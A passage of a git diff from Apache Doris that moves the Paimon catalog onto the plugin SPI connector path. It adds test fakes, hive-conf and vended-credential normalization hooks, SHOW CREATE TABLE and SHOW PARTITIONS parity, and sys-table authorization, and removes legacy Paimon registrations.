Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + Map props = new HashMap<>(); + props.put("s3.endpoint", "static-ep"); + // 2-arg ctor -> context == null (the offline harness path). + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(props, new RecordingPaimonCatalogOps()); + + Map scanProps = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + // WHY: with no context (offline / no vended support) the static-only behavior is preserved — + // no overlay, no NPE. MUTATION: NPE on null context, or adding vended keys -> red. + Assertions.assertEquals("static-ep", scanProps.get("location.s3.endpoint")); + Assertions.assertFalse(scanProps.containsKey("location.AWS_ACCESS_KEY"), + "no context -> no vended overlay"); + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java index 4ad37567015e16..1032a12436b755 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java @@ -19,6 +19,8 @@ import org.apache.doris.connector.spi.ConnectorContext; +import java.util.Collections; +import java.util.Map; import java.util.concurrent.Callable; /** @@ -36,11 +38,26 @@ final class RecordingConnectorContext implements ConnectorContext { int authCount; boolean failAuth; + // ---- FIX-HMS-CONFRES: loadHiveConfResources hook ---- + /** Map the fake returns from {@link #loadHiveConfResources} (the "resolved" hive-site.xml keys). */ + Map hiveConfResources = Collections.emptyMap(); + /** Whether the connector invoked {@link #loadHiveConfResources}. */ + boolean hiveConfResourcesCalled; + /** The {@code resources} string the connector passed to {@link #loadHiveConfResources}. */ + String lastHiveConfResourcesArg; + @Override public String getCatalogName() { return "test"; } + @Override + public Map loadHiveConfResources(String resources) { + hiveConfResourcesCalled = true; + lastHiveConfResourcesArg = resources; + return hiveConfResources; + } + @Override public long getCatalogId() { return 0; diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java index 51c89537b12e7f..b966c528a03b9c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -116,6 +116,14 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { /** The base table the metadata layer passed to the most recent {@link #branchExists} call. */ Table lastBranchExistsTable; + // ---- FIX-TABLE-STATS: row-count seam ---- + /** Configurable row count returned by {@link #rowCount}. */ + long rowCount; + /** The table the metadata layer passed to the most recent {@link #rowCount} call. */ + Table lastRowCountTable; + /** When set, {@link #rowCount} throws (drives the best-effort planning-failure path). */ + boolean throwOnRowCount; + @Override public List listDatabases() { log.add("listDatabases"); @@ -282,6 +290,16 @@ public boolean branchExists(Table table, String branchName) { return branchExists; } + @Override + public long rowCount(Table table) { + log.add("rowCount"); + lastRowCountTable = table; + if (throwOnRowCount) { + throw new RuntimeException("simulated planning failure"); + } + return rowCount; + } + @Override public void close() { log.add("close"); diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 702d2427badc10..6deed71f9579a0 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -103,4 +103,40 @@ default T executeAuthenticated(Callable task) throws Exception { default ConnectorMetaInvalidator getMetaInvalidator() { return ConnectorMetaInvalidator.NOOP; } + + /** + * Resolves the catalog's {@code hive.conf.resources} (comma-separated hive-site.xml file names + * under the FE's {@code hadoop_config_dir}) into a flat key->value map the connector can + * overlay onto its {@code HiveConf}. The connector cannot perform this filesystem/Config-dir + * resolution itself (it must not import fe-core/fe-common); the engine context loads the files + * via {@code CatalogConfigFileUtils}, matching legacy HMS behavior. + * + *

      The default returns empty (no external file support), so connectors that do not use it — + * and every other connector — are unaffected. + * + * @param resources the raw {@code hive.conf.resources} value (may be null/blank) + * @return a flat map of the resolved hive-site.xml key/values, or empty when none + * @throws RuntimeException if a referenced file is missing/unreadable (fail-loud, legacy parity) + */ + default Map loadHiveConfResources(String resources) { + return Collections.emptyMap(); + } + + /** + * Normalizes raw per-table vended cloud-storage credentials (the token map a REST catalog + * returns, e.g. {@code fs.oss.accessKeyId} / {@code s3.access-key}) into the BE-facing storage + * property map ({@code AWS_ACCESS_KEY} / {@code AWS_SECRET_KEY} / {@code AWS_TOKEN} / + * {@code AWS_ENDPOINT} / {@code AWS_REGION}). The connector extracts the raw token from the live + * table (paimon SDK only); the engine performs the same {@code StorageProperties} normalization + * it uses for static catalog credentials (the connector cannot import fe-core). + * + *

      The default returns empty (no normalization machinery / empty input), so every other + * connector is unaffected. + * + * @param rawVendedCredentials the raw per-table token map (may be null/empty) + * @return the BE-facing normalized storage-property map, or empty when none + */ + default Map vendStorageCredentials(Map rawVendedCredentials) { + return Collections.emptyMap(); + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/catalog/Env.java b/fe/fe-core/src/main/java/org/apache/doris/catalog/Env.java index b6de5fa9e06f42..efa4ecc3e503b8 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/catalog/Env.java +++ b/fe/fe-core/src/main/java/org/apache/doris/catalog/Env.java @@ -101,6 +101,8 @@ import org.apache.doris.datasource.ExternalMetaCacheMgr; import org.apache.doris.datasource.ExternalMetaIdMgr; import org.apache.doris.datasource.InternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.datasource.PluginDrivenSysExternalTable; import org.apache.doris.datasource.SplitSourceManager; import org.apache.doris.datasource.hive.HiveTransactionMgr; import org.apache.doris.datasource.hive.event.MetastoreEventsProcessor; @@ -4936,6 +4938,35 @@ public static void getDdlStmt(Command command, String dbName, TableIf table, Lis sb.append("\n)"); } else if (table.getType() == TableType.PLUGIN_EXTERNAL_TABLE) { addTableComment(table, sb); + PluginDrivenExternalTable pluginExternalTable; + if (table instanceof PluginDrivenSysExternalTable) { + // Mirror the legacy paimon unwrap: a system table ($snapshots etc.) renders the + // DDL of its source table. Check the sys subclass FIRST (it extends + // PluginDrivenExternalTable). + pluginExternalTable = ((PluginDrivenSysExternalTable) table).getSourceTable(); + } else if (table instanceof PluginDrivenExternalTable) { + pluginExternalTable = (PluginDrivenExternalTable) table; + } else { + throw new RuntimeException("Unexpected plugin table type: " + table.getClass().getSimpleName()); + } + // Connectors that surface table properties (e.g. paimon coreOptions: path / file.format) + // render LOCATION + PROPERTIES for SHOW CREATE TABLE parity (D-046). Connectors that do + // NOT (e.g. MaxCompute) return an empty map and stay comment-only — no empty LOCATION '' + // / PROPERTIES () lines, preserving their pre-existing DDL. + Map properties = pluginExternalTable.getTableProperties(); + if (!properties.isEmpty()) { + sb.append("\nLOCATION '").append(properties.getOrDefault("path", "")).append("'"); + sb.append("\nPROPERTIES ("); + Iterator> iterator = properties.entrySet().iterator(); + while (iterator.hasNext()) { + Entry prop = iterator.next(); + sb.append("\n \"").append(prop.getKey()).append("\" = \"").append(prop.getValue()).append("\""); + if (iterator.hasNext()) { + sb.append(","); + } + } + sb.append("\n)"); + } } createTableStmt.add(sb + ";"); diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 72526c41df41cf..69fb4be776aee1 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -18,19 +18,30 @@ package org.apache.doris.connector; import org.apache.doris.cloud.security.SecurityChecker; +import org.apache.doris.common.CatalogConfigFileUtils; import org.apache.doris.common.Config; import org.apache.doris.common.EnvUtils; import org.apache.doris.common.security.authentication.ExecutionAuthenticator; import org.apache.doris.connector.api.ConnectorHttpSecurityHook; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorMetaInvalidator; +import org.apache.doris.datasource.credentials.CredentialUtils; +import org.apache.doris.datasource.property.storage.StorageProperties; + +import com.google.common.base.Strings; +import org.apache.hadoop.hive.conf.HiveConf; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; import java.util.Collections; import java.util.HashMap; +import java.util.List; import java.util.Map; import java.util.Objects; import java.util.concurrent.Callable; +import java.util.function.Function; import java.util.function.Supplier; +import java.util.stream.Collectors; /** * Default implementation of {@link ConnectorContext}. @@ -40,6 +51,8 @@ */ public class DefaultConnectorContext implements ConnectorContext { + private static final Logger LOG = LogManager.getLogger(DefaultConnectorContext.class); + private static final ExecutionAuthenticator NOOP_AUTH = new ExecutionAuthenticator() {}; private final String catalogName; @@ -110,6 +123,48 @@ public T executeAuthenticated(Callable task) throws Exception { return authSupplier.get().execute(task); } + @Override + public Map loadHiveConfResources(String resources) { + if (Strings.isNullOrEmpty(resources)) { + return Collections.emptyMap(); + } + // Reuse the EXACT legacy loader (same hadoop_config_dir base, comma-split, fail-if-missing) + // so the file-resolution semantics are byte-identical to legacy HMSBaseProperties; only the + // resolved key/values cross into the connector (no HiveConf/Configuration identity hazard). + HiveConf hc = CatalogConfigFileUtils.loadHiveConfFromHiveConfDir(resources); + Map out = new HashMap<>(); + for (Map.Entry e : hc) { // HiveConf IS-A Iterable> + out.put(e.getKey(), e.getValue()); + } + return out; + } + + @Override + public Map vendStorageCredentials(Map rawVendedCredentials) { + if (rawVendedCredentials == null || rawVendedCredentials.isEmpty()) { + return Collections.emptyMap(); + } + // Reuse the EXACT legacy normalization tail (AbstractVendedCredentialsProvider): filter to + // cloud-storage props, run StorageProperties.createAll (normalizes arbitrary token key shapes + // + derives region/endpoint), then map to the BE-facing AWS_* properties. Single source of + // truth — no re-ported normalization that could drift. Fail-soft (empty) on any error, + // matching the legacy provider, so a malformed token degrades gracefully rather than killing + // the scan. + try { + Map filtered = CredentialUtils.filterCloudStorageProperties(rawVendedCredentials); + if (filtered.isEmpty()) { + return Collections.emptyMap(); + } + List vended = StorageProperties.createAll(filtered); + Map map = vended.stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity())); + return CredentialUtils.getBackendPropertiesFromStorageMap(map); + } catch (Exception e) { + LOG.warn("Failed to normalize vended credentials", e); + return Collections.emptyMap(); + } + } + private static Map buildEnvironment() { Map env = new HashMap<>(); String dorisHome = EnvUtils.getDorisHome(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java index 290fc5ca0ae767..882d4d0da73b9e 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java @@ -27,7 +27,6 @@ import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalogFactory; -import org.apache.doris.datasource.paimon.PaimonExternalCatalogFactory; import org.apache.doris.datasource.test.TestExternalCatalog; import org.apache.doris.nereids.trees.plans.commands.CreateCatalogCommand; @@ -46,10 +45,10 @@ public class CatalogFactory { private static final Logger LOG = LogManager.getLogger(CatalogFactory.class); // Only these catalog types are routed through the SPI connector path. - // Other types (hms, iceberg, paimon, hudi) still use + // Other types (hms, iceberg, hudi) still use // their built-in ExternalCatalog implementations until their ConnectorProviders are fully ready. private static final Set SPI_READY_TYPES = - ImmutableSet.of("jdbc", "es", "trino-connector", "max_compute"); + ImmutableSet.of("jdbc", "es", "trino-connector", "max_compute", "paimon"); /** * create the catalog instance from catalog log. @@ -139,10 +138,6 @@ private static CatalogIf createCatalog(long catalogId, String name, String resou catalog = IcebergExternalCatalogFactory.createCatalog( catalogId, name, resource, props, comment); break; - case "paimon": - catalog = PaimonExternalCatalogFactory.createCatalog( - catalogId, name, resource, props, comment); - break; case "lakesoul": throw new DdlException("Lakesoul catalog is no longer supported"); case "doris": diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java index d54ba036caab86..b09a9c96367101 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java @@ -48,6 +48,7 @@ import java.io.IOException; import java.util.ArrayList; import java.util.Collections; +import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; @@ -221,7 +222,8 @@ protected PluginDrivenSchemaCacheValue toSchemaCacheValue(ConnectorMetadata meta } } } - return new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames); + return new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames, + tableSchema.getProperties()); } @Override @@ -250,6 +252,28 @@ public List getPartitionColumns() { .orElse(Collections.emptyList()); } + /** + * The connector's user-facing table properties (e.g. paimon coreOptions: path / file.format / + * write-only), used by SHOW CREATE TABLE to render LOCATION + PROPERTIES (D-046). The + * FE-internal schema-control keys ({@code partition_columns} / {@code primary_keys}, emitted by + * the connector so {@link #initSchema()} can derive the partition columns) are stripped — they + * are not user-facing options and must not leak into the rendered PROPERTIES(...). + */ + public Map getTableProperties() { + makeSureInitialized(); + Map raw = getSchemaCacheValue() + .map(value -> ((PluginDrivenSchemaCacheValue) value).getTableProperties()) + .orElse(Collections.emptyMap()); + Map result = new LinkedHashMap<>(); + for (Map.Entry entry : raw.entrySet()) { + if ("partition_columns".equals(entry.getKey()) || "primary_keys".equals(entry.getKey())) { + continue; + } + result.put(entry.getKey(), entry.getValue()); + } + return result; + } + @Override public boolean supportInternalPartitionPruned() { // Unconditional true, mirroring legacy MaxComputeExternalTable (and IcebergExternalTable). @@ -449,6 +473,10 @@ public String getEngine() { // TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName() returns null // (no switch case in TableType.toEngineName), matching legacy behavior. return TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName(); + case "paimon": + // TableType.PAIMON_EXTERNAL_TABLE.toEngineName() returns "paimon", + // preserving the legacy PaimonExternalTable engine name. + return TableType.PAIMON_EXTERNAL_TABLE.toEngineName(); default: return super.getEngine(); } @@ -467,6 +495,8 @@ public String getEngineTableTypeName() { return TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.name(); case "max_compute": return TableType.MAX_COMPUTE_EXTERNAL_TABLE.name(); + case "paimon": + return TableType.PAIMON_EXTERNAL_TABLE.name(); default: return TableType.PLUGIN_EXTERNAL_TABLE.name(); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java index 41f16f5c9a9494..270e5ce1befa57 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java @@ -19,7 +19,9 @@ import org.apache.doris.catalog.Column; +import java.util.Collections; import java.util.List; +import java.util.Map; /** * {@link SchemaCacheValue} for plugin-driven external tables. @@ -46,12 +48,23 @@ public class PluginDrivenSchemaCacheValue extends SchemaCacheValue { private final List partitionColumns; private final List partitionColumnRemoteNames; + // The connector's raw table-properties map (e.g. paimon coreOptions: path / file.format / + // write-only), retained so SHOW CREATE TABLE can render LOCATION + PROPERTIES (D-046). The + // transient ConnectorTableSchema is not kept on the table, so this is the persisted-via-cache + // carrier (mirroring how the partition-column views are cached). + private final Map tableProperties; public PluginDrivenSchemaCacheValue(List schema, List partitionColumns, List partitionColumnRemoteNames) { + this(schema, partitionColumns, partitionColumnRemoteNames, Collections.emptyMap()); + } + + public PluginDrivenSchemaCacheValue(List schema, List partitionColumns, + List partitionColumnRemoteNames, Map tableProperties) { super(schema); this.partitionColumns = partitionColumns; this.partitionColumnRemoteNames = partitionColumnRemoteNames; + this.tableProperties = tableProperties == null ? Collections.emptyMap() : tableProperties; } public List getPartitionColumns() { @@ -61,4 +74,8 @@ public List getPartitionColumns() { public List getPartitionColumnRemoteNames() { return partitionColumnRemoteNames; } + + public Map getTableProperties() { + return tableProperties; + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java index ea7b440dee005c..6dacd197fe332d 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java @@ -69,7 +69,6 @@ import org.apache.doris.datasource.iceberg.source.IcebergScanNode; import org.apache.doris.datasource.lakesoul.LakeSoulExternalTable; import org.apache.doris.datasource.lakesoul.source.LakeSoulScanNode; -import org.apache.doris.datasource.paimon.source.PaimonScanNode; import org.apache.doris.fs.DirectoryLister; import org.apache.doris.fs.FileSystemDirectoryLister; import org.apache.doris.fs.TransactionScopeCachingDirectoryListerFactory; @@ -778,9 +777,6 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla } else if (table instanceof IcebergExternalTable || table instanceof IcebergSysExternalTable) { scanNode = new IcebergScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); - } else if (table.getType() == TableIf.TableType.PAIMON_EXTERNAL_TABLE) { - scanNode = new PaimonScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, - context.getScanContext()); } else if (table instanceof LakeSoulExternalTable) { scanNode = new LakeSoulScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/UserAuthentication.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/UserAuthentication.java index 1f67afe4fae55a..d44925946a3912 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/UserAuthentication.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/UserAuthentication.java @@ -27,6 +27,7 @@ import org.apache.doris.common.ErrorReport; import org.apache.doris.common.UserException; import org.apache.doris.datasource.CatalogIf; +import org.apache.doris.datasource.PluginDrivenSysExternalTable; import org.apache.doris.datasource.iceberg.IcebergSysExternalTable; import org.apache.doris.datasource.paimon.PaimonSysExternalTable; import org.apache.doris.mysql.privilege.AccessControllerManager; @@ -60,6 +61,13 @@ public static void checkPermission(TableIf table, ConnectContext connectContext, } else if (table instanceof IcebergSysExternalTable) { authTable = ((IcebergSysExternalTable) table).getSourceTable(); authColumns = Collections.emptySet(); + } else if (table instanceof PluginDrivenSysExternalTable) { + // After the SPI cutover a paimon sys-table ($snapshots/$files/...) is a + // PluginDrivenSysExternalTable; authorize against its source table (mirrors the + // legacy PaimonSysExternalTable branch above), so a user holding SELECT on db.tbl + // can query db.tbl$snapshots. + authTable = ((PluginDrivenSysExternalTable) table).getSourceTable(); + authColumns = Collections.emptySet(); } String tableName = authTable.getName(); DatabaseIf db = authTable.getDatabase(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java index 703d217e74d24c..8ba4b0c5a2c20d 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java @@ -36,12 +36,16 @@ import org.apache.doris.common.proc.ProcResult; import org.apache.doris.common.proc.ProcService; import org.apache.doris.common.util.OrderByPair; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; @@ -293,26 +297,48 @@ private ShowResultSet handleShowPluginDrivenTablePartitions() throws AnalysisExc ExternalTable dorisTable = pluginCatalog.getDbOrAnalysisException(dbName) .getTableOrAnalysisException(tableName.getTbl()); - // Route partition listing through the connector SPI. The SPI's - // listPartitionNames has no offset/limit, so paging is applied FE-side below. + // Route partition listing through the connector SPI. ConnectorSession session = pluginCatalog.buildConnectorSession(); ConnectorMetadata metadata = pluginCatalog.getConnector().getMetadata(session); ConnectorTableHandle handle = metadata .getTableHandle(session, dorisTable.getRemoteDbName(), dorisTable.getRemoteName()) .orElseThrow(() -> new AnalysisException( "table not found: " + dbName + "." + tableName.getTbl())); - List partitionNames = metadata.listPartitionNames(session, handle); List> rows = new ArrayList<>(); - for (String partition : partitionNames) { - if (filterMap != null && !filterMap.isEmpty()) { - if (!PartitionsProcDir.filterExpression(FILTER_PARTITION_NAME, partition, filterMap)) { + if (hasPartitionStatsCapability()) { + // Rich 5-column result (Partition / PartitionKey / RecordCount / FileSizeInBytes / + // FileCount), matching the legacy paimon SHOW PARTITIONS (D-045). PartitionKey is the + // table's partition-column names comma-joined, identical on every row (legacy semantics). + String partitionColumnsStr = ((PluginDrivenExternalTable) dorisTable).getPartitionColumns() + .stream().map(Column::getName).collect(Collectors.joining(",")); + for (ConnectorPartitionInfo partition + : metadata.listPartitions(session, handle, Optional.empty())) { + String partitionName = partition.getPartitionName(); + if (filterMap != null && !filterMap.isEmpty() + && !PartitionsProcDir.filterExpression(FILTER_PARTITION_NAME, partitionName, filterMap)) { continue; } + List row = new ArrayList<>(5); + row.add(partitionName); + row.add(partitionColumnsStr); + row.add(String.valueOf(partition.getRowCount())); + row.add(String.valueOf(partition.getSizeBytes())); + row.add(String.valueOf(partition.getFileCount())); + rows.add(row); + } + } else { + // Single-column result (partition name only). The SPI's listPartitionNames has no + // offset/limit, so paging is applied FE-side below. + for (String partition : metadata.listPartitionNames(session, handle)) { + if (filterMap != null && !filterMap.isEmpty() + && !PartitionsProcDir.filterExpression(FILTER_PARTITION_NAME, partition, filterMap)) { + continue; + } + List row = new ArrayList<>(1); + row.add(partition); + rows.add(row); } - List list = new ArrayList<>(); - list.add(partition); - rows.add(list); } // sort by partition name if (orderByPairs != null && orderByPairs.get(0).isDesc()) { @@ -324,6 +350,22 @@ private ShowResultSet handleShowPluginDrivenTablePartitions() throws AnalysisExc return new ShowResultSet(getMetaData(), rows); } + /** + * Whether the current (plugin) catalog's connector exposes per-partition statistics + * ({@link ConnectorCapability#SUPPORTS_PARTITION_STATS}). Drives the 5-column SHOW PARTITIONS + * result for paimon while non-declaring connectors (e.g. MaxCompute) stay single-column. Both + * {@link #handleShowPluginDrivenTablePartitions()} and {@link #getMetaData()} consult this so the + * column headers and the row width never disagree. + */ + private boolean hasPartitionStatsCapability() { + if (!(catalog instanceof PluginDrivenExternalCatalog)) { + return false; + } + Connector connector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + return connector != null + && connector.getCapabilities().contains(ConnectorCapability.SUPPORTS_PARTITION_STATS); + } + private ShowResultSet handleShowPaimonTablePartitions() throws AnalysisException { PaimonExternalCatalog paimonCatalog = (PaimonExternalCatalog) catalog; String db = tableName.getDb(); @@ -460,7 +502,10 @@ public ShowResultSetMetaData getMetaData() { builder.addColumn(new Column("Partition", ScalarType.createVarchar(60))); builder.addColumn(new Column("Lower Bound", ScalarType.createVarchar(100))); builder.addColumn(new Column("Upper Bound", ScalarType.createVarchar(100))); - } else if (catalog instanceof PaimonExternalCatalog) { + } else if (catalog instanceof PaimonExternalCatalog || hasPartitionStatsCapability()) { + // Legacy paimon catalog (pre-cutover) OR a plugin connector that declares + // SUPPORTS_PARTITION_STATS (paimon-after-cutover): 5-column rich result. Must match the + // row width built in handleShowPluginDrivenTablePartitions(). builder.addColumn(new Column("Partition", ScalarType.createVarchar(300))) .addColumn(new Column("PartitionKey", ScalarType.createVarchar(300))) .addColumn(new Column("RecordCount", ScalarType.createVarchar(300))) diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java index 62de597b2b0083..f33bbc66d83f67 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java @@ -50,7 +50,6 @@ import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; -import org.apache.doris.datasource.paimon.PaimonExternalCatalog; import org.apache.doris.mysql.privilege.PrivPredicate; import org.apache.doris.nereids.CascadesContext; import org.apache.doris.nereids.analyzer.Scope; @@ -385,14 +384,12 @@ private void checkEngineWithCatalog() { throw new AnalysisException("Hms type catalog can only use `hive` engine."); } else if (catalog instanceof IcebergExternalCatalog && !engineName.equals(ENGINE_ICEBERG)) { throw new AnalysisException("Iceberg type catalog can only use `iceberg` engine."); - } else if (catalog instanceof PaimonExternalCatalog && !engineName.equals(ENGINE_PAIMON)) { - throw new AnalysisException("Paimon type catalog can only use `paimon` engine."); } else if (catalog instanceof PluginDrivenExternalCatalog) { - // After the SPI cutover a max_compute catalog is a PluginDrivenExternalCatalog; mirror the - // legacy MaxComputeExternalCatalog consistency check, keyed on the connector type. + // After the SPI cutover a max_compute / paimon catalog is a PluginDrivenExternalCatalog; mirror + // the legacy per-type consistency check, keyed on the connector type. String pluginEngine = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); if (pluginEngine != null && !engineName.equals(pluginEngine)) { - throw new AnalysisException("MaxCompute type catalog can only use `maxcompute` engine."); + throw new AnalysisException("This catalog can only use `" + pluginEngine + "` engine."); } } } @@ -912,12 +909,10 @@ private void paddingEngineName(String ctlName, ConnectContext ctx) { engineName = ENGINE_HIVE; } else if (catalog instanceof IcebergExternalCatalog) { engineName = ENGINE_ICEBERG; - } else if (catalog instanceof PaimonExternalCatalog) { - engineName = ENGINE_PAIMON; } else if (catalog instanceof PluginDrivenExternalCatalog && pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog) != null) { - // After the SPI cutover a max_compute catalog is a PluginDrivenExternalCatalog; pad the - // legacy engine so the no-ENGINE CREATE TABLE keeps working (mirrors the MC branch above). + // After the SPI cutover a max_compute / paimon catalog is a PluginDrivenExternalCatalog; pad + // the legacy engine so the no-ENGINE CREATE TABLE keeps working (mirrors the MC/Iceberg above). engineName = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); } else { throw new AnalysisException("Current catalog does not support create table: " + ctlName); @@ -938,6 +933,8 @@ private static String pluginCatalogTypeToEngine(PluginDrivenExternalCatalog cata switch (catalog.getType()) { case "max_compute": return ENGINE_MAXCOMPUTE; + case "paimon": + return ENGINE_PAIMON; default: return null; } diff --git a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java index bcfb4def169019..3d92992c7f1bc6 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java +++ b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java @@ -166,13 +166,6 @@ import org.apache.doris.datasource.lakesoul.LakeSoulExternalCatalog; import org.apache.doris.datasource.lakesoul.LakeSoulExternalDatabase; import org.apache.doris.datasource.lakesoul.LakeSoulExternalTable; -import org.apache.doris.datasource.paimon.PaimonDLFExternalCatalog; -import org.apache.doris.datasource.paimon.PaimonExternalCatalog; -import org.apache.doris.datasource.paimon.PaimonExternalDatabase; -import org.apache.doris.datasource.paimon.PaimonExternalTable; -import org.apache.doris.datasource.paimon.PaimonFileExternalCatalog; -import org.apache.doris.datasource.paimon.PaimonHMSExternalCatalog; -import org.apache.doris.datasource.paimon.PaimonRestExternalCatalog; import org.apache.doris.datasource.test.TestExternalCatalog; import org.apache.doris.datasource.test.TestExternalDatabase; import org.apache.doris.datasource.test.TestExternalTable; @@ -388,13 +381,8 @@ public class GsonUtils { .registerSubtype(IcebergJdbcExternalCatalog.class, IcebergJdbcExternalCatalog.class.getSimpleName()) .registerSubtype(IcebergS3TablesExternalCatalog.class, IcebergS3TablesExternalCatalog.class.getSimpleName()) - .registerSubtype(PaimonExternalCatalog.class, PaimonExternalCatalog.class.getSimpleName()) - .registerSubtype(PaimonHMSExternalCatalog.class, PaimonHMSExternalCatalog.class.getSimpleName()) - .registerSubtype(PaimonFileExternalCatalog.class, PaimonFileExternalCatalog.class.getSimpleName()) - .registerSubtype(PaimonRestExternalCatalog.class, 